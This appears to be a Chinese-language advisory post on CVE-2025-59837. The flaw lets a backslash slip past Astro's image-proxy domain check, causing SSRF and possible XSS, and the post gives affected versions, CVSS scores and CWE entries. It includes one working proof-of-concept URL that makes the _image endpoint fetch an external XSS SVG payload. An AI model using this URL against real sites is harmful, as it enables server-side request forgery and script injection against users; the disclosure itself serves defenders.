Astro图像代理域名验证绕过漏洞导致SSRF和XSS攻击

本文详细分析了Astro框架中图像代理域名验证绕过漏洞CVE-2025-59837,该漏洞允许攻击者通过反斜杠绕过验证,导致服务器端请求伪造和潜在跨站脚本攻击,影响版本5.13.4至5.13.9。

Astro图像代理域名验证绕过漏洞分析

漏洞概述

这是一个针对CVE-2025-58179修复补丁的绕过漏洞。在提交9ecf359中的修复措施虽然阻止了http://https:////的使用,但攻击者仍可通过使用反斜杠(\)来绕过验证,端点仍然会发起服务器端请求。

技术细节

受影响版本

  • 受影响版本:>= 5.13.4, < 5.13.10
  • 已修复版本:5.13.10

漏洞证明

攻击者可通过以下URL格式利用此漏洞:

1
https://astro.build/_image?href=\raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg

相关引用

安全评估

严重程度

  • 严重等级:高
  • CVSS总体评分:7.2/10

CVSS v3基础指标

  • 攻击向量:网络
  • 攻击复杂度:低
  • 所需权限:无
  • 用户交互:无
  • 范围:已更改
  • 机密性:低
  • 完整性:低
  • 可用性:无

CVSS评分详情:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

EPSS评分

  • 利用预测评分系统:0.037%(第10百分位)

安全弱点

CWE-79

在网页生成过程中输入验证不当(跨站脚本) 产品在将用户可控的输入放置到提供给其他用户的网页输出之前,未能正确进行验证或验证不当。

CWE-918

服务器端请求伪造(SSRF) Web服务器从上游组件接收URL或类似请求并获取该URL的内容,但未能充分确保请求被发送到预期目的地。

漏洞信息

  • CVE ID:CVE-2025-59837
  • GHSA ID:GHSA-qcpr-679q-rhm2
  • 源代码:withastro/astro

致谢

感谢everping和GeneralZero两位研究人员的报告。

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计